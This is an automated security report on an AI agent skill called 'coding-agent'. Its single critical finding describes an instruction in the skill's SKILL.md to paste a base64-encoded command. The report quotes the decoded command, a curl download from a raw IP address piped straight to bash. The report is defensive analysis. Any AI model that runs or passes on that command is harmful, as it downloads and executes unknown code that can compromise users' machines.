Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution via Unverified Script Download.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (1)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Remote Code Execution via Unverified Script Download: The skill provides an explicit instruction for macOS users to 'Copy and execute' a `bash` command that decodes a base64 string and pipes it directly to `bash`. The decoded command is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an external, unverified IP address (`91.92.242.30`). This constitutes a severe command injection and supply chain risk, as the content of the downloaded script is unknown and could perform malicious actions, including data exfiltration, system compromise, or installation of unwanted software. Replace the direct download and execution of an unverified script from an external IP address with a secure installation method. This could involve using a trusted package manager, providing a signed installer, or hosting the script on a verified domain with content review. At minimum, the script should be hosted on a secure, verified domain and its contents should be reviewed for safety and integrity. | LLM | SKILL.md:17 |